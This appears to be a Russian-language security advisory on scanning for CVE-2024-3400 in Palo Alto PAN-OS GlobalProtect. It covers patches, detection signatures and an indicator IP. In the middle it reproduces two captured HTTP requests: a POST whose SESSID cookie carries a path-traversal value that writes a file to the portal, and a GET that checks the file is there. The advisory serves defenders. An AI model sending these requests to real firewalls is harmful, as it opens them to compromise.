Возросла активность интернет-сканирования, свидетельствующая о том, что злоумышленники целенаправленно ищут системы, уязвимые к CVE-2024-3400 - критической уязвимости в компоненте GlobalProtect операционной системы PAN-OS компании Palo Alto Networks.
Описание
Исследователи кибербезопасности из SANS ISC зафиксировали систематические атаки с IP-адреса 141.98.82[.]26, нацеленные на конечную точку загрузки файлов портала GlobalProtect.
Уязвимость получила максимально возможную оценку 10.0 по шкале CVSS 4.0 и классифицирована Palo Alto Networks как имеющая наивысший приоритет срочности. Проблема затрагивает версии PAN-OS 10.2, 11.0 и 11.1 при наличии настроенного портала или шлюза GlobalProtect. При этом облачные сервисы Cloud NGFW, Panorama и Prisma Access не подвержены данной уязвимости.
Эксплуатация уязвимости включает две последовательные операции. Сначала злоумышленник отправляет POST-запрос к /ssl-vpn/hipreport.esp с модифицированным идентификатором сессии, что приводит к созданию файла в директории GlobalProtect.
| 1 2 3 4 5 6 7 8 9 10 | POST /ssl-vpn/hipreport.esp Host: [honeypot ip]:8080 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Connection: close Content-Length: 174 Content-Type: application/x-www-form-urlencoded Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/33EGKkp7zRbFyf06zCV4mzq1vDK.txt; Accept-Encoding: gzip user=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global |
Затем GET-запрос по пути к этому файлу подтверждает успешную загрузку, если сервер возвращает статус "403", указывающий на существование файла без выполнения какого-либо кода.
| 1 2 3 4 5 | GET /global-protect/portal/images/33KFpJLBHsMmkNuxs7pqpGOIIgF.txt host: [honeypot ip] user-agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 connection: close accept-encoding: gzip |
В реальных условиях атаки злоумышленники могут комбинировать эту технику с выполнением команд, получая полный root-контроль над межсетевым экраном. Особую озабоченность вызывает доступность публичных proof-of-concept эксплойтов и демонстрация техник сохранения доступа после взлома, что значительно повышает риски для непропатченных систем.
Несмотря на всплеск сканирующей активности, подтвержденных масштабных атак в дикой природе пока не зарегистрировано, за исключением тестовых эксплуатаций. Однако простота автоматизации атак, отсутствие требования аутентификации и сетевая доступность уязвимости делают ее привлекательной целью для оппортунистических операторов и автоматизированных ботнетов.
Palo Alto Networks уже выпустила исправления в версиях PAN-OS 10.2.9-h1, 11.0.4-h1 и 11.1.2-h3, а также предоставила временные решения для других поддерживаемых выпусков. Специалисты настоятельно рекомендуют немедленно обновить уязвимые системы.
Организации с подпиской Threat Prevention могут развернуть сигнатуры 95187, 95189 и 95191 для блокировки попыток эксплуатации через интерфейс GlobalProtect. Следует отметить, что отключение телеметрии устройств больше не считается эффективной мерой защиты.
До применения исправлений администраторам следует отслеживать конечные точки GlobalProtect на предмет аномальных POST или GET запросов к hipreport.esp и /global-protect/portal/images/. Системы обнаружения вторжений должны настраиваться на оповещения о необычных строках пользовательского агента или повторяющихся шаблонах ответов 404/403.
Для скомпрометированных устройств, которые невозможно полностью доверять, Palo Alto Networks предоставила расширенные процедуры сброса к заводским настройкам через службу поддержки клиентов.
При текущем уровне сканирования и доступности публичных эксплойтов организациям необходимо отнестись к данной уязвимости с максимальной серьезностью для предотвращения потенциального полного компрометации систем. Непрерывный мониторинг, своевременное применение исправлений и использование превентивных сигнатур остаются ключевыми элементами защиты от развивающихся попыток эксплуатации.
Индикаторы компрометации
IPv4
- 141.98.82.26